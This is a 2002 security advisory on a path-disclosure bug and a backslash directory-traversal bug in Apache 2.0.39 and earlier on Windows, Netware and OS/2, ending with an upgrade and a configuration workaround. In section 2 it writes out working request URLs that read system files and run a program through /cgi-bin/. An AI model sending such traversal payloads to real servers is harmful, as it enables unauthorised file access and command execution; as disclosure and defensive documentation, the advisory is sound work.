###################################################################### Luigi Auriemma Application: Apache WebServer (http://httpd.apache.org) Version: 2.0.39 and previous 2.0.x, ONLY on systems that supports backslash path delimiters (Win/Netware/OS2 etc...) Bug: Directory traversal vulnerability and path disclosure code on it. An attacker can view the path where is located the server. Date: 16 Aug 2002 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org CAN-2002-0654 CAN-2002-0661 ###################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ###################################################################### =============== 1) Introduction =============== The bug I have found about the directory traversal can be classified as a high risk bug and the path disclosure as a low risk. With the first bug an attacker can see every file in the system and execute it using the /cgi-bin/ path. The bug was shown to the Apache Group some minutes after it's being discovered. The bug was quickly fixed. The second bug instead is a simple path disclosure bug, useful for obtaining more info about the server (important if the administrator hide some information) - IMPORTANT NOTE - The ASF recommends all Win32, Netware and OS2 users immediately upgrade to the 2.0.40 or, temporary, apply the fix suggested in the Fix section of this advisory. It is also suggested that any of the un*x-flavors also should consider upgrading to 2.0.40 to eliminate the path-revealing bugs that apply to all versions. ###################################################################### ====== 2) Bug ====== A) CAN-2002-0654 ================ The bug is not dangerous because it does not give remote access to the system or other data accesses but for an attacker it is useful in gathering detaild information about the server to launch other malicious attacks. With this bug we can see the path where Apache is installed, so we can know if the server run on a Windows machine, if it is the second version of Apache (Apache2) and naturally the server version (all of the the info is useful if the administrator has obscured the Server field or other info about the server, so if the bug is present, we know for example that the Apache installed is a version prior the 2.0.40). However let's go with the example. From the browser we must insert the following string: http://SERVER/error/HTTP_NOT_FOUND.html.var Then the server will answer with this page: |Not Acceptable | |An appropriate representation of the requested resource /error/HTTP_NOT_FOUND.html.var could not be found on this server. |Available variants: | | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr As we can see, the server answer with the full path of the file we have requested. We can request all the files .var in the error folder and we will have the same result. More detailed info can be found on the Apache website http://httpd.apache.org B) CAN-2002-0661 ================ The problem is in the management of the bad chars that can be used to launch some attacks, such as the directory traversal. In fact the backslash char ('\' == %5c) is not checked as a bad char, so it can be used for seeking the directories of systems that use it as a path delimiter (Windows, Netware, OS2 and others). Then another problem is that the attacker can execute commands on the remote host simply using the /cgi-bin/ path. The following are two simple examples. for view the file winnt\win.ini: http://SERVER/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini for run the wintty utility in the Apache2/bin folder: http://SERVER/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO In human readable form, they mean: http://SERVER/error/\..\..\..\..\winnt\win.ini http://SERVER/cgi-bin/\..\bin\wintty.exe?-t+HELLO So in the first example we go down to the root path with \..\..\..\..\ because we are in "c:\program files\Apache Group\Apache2\error". Instead in the second example we use the /cgi-bin/ path and we pass arguments with "file.exe?arg1+arg2+arg3+...". More detailed info will be found on the Apache website http://httpd.apache.org ###################################################################### =========== 3) The Code =========== Look the examples in section 2. ###################################################################### ====== 4) Fix ====== Apache 2.0.40 from Apache website (http://httpd.apache.org) However this is a simple workaround suggested by the Apache Group for the directory traversal bug: --- A simple one line workaround in the httpd.conf file will disallow the vulnerability. Prior to the first 'Alias' or 'Redirect' directive, add the following directive to the global server configuration: RedirectMatch 400 "\\\.\." --- ######################################################################